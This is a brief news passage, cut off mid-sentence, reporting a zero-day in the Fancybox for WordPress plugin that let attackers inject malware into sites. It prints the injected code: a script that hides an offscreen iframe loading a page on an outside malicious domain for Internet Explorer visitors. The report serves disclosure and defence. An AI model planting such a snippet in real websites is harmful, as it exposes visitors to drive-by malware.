
Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin
Four hours ago, users seeking support on WordPress.org reported malware injected into their sites from an unknown source. The vulnerability allows for an iframe to be injected, redirecting to a “203koko” site. [html light=”true”] <script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(‘ <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>’);}/*]]>*/</script> [/html] After working together to determine the plugins they have in common, users identified…











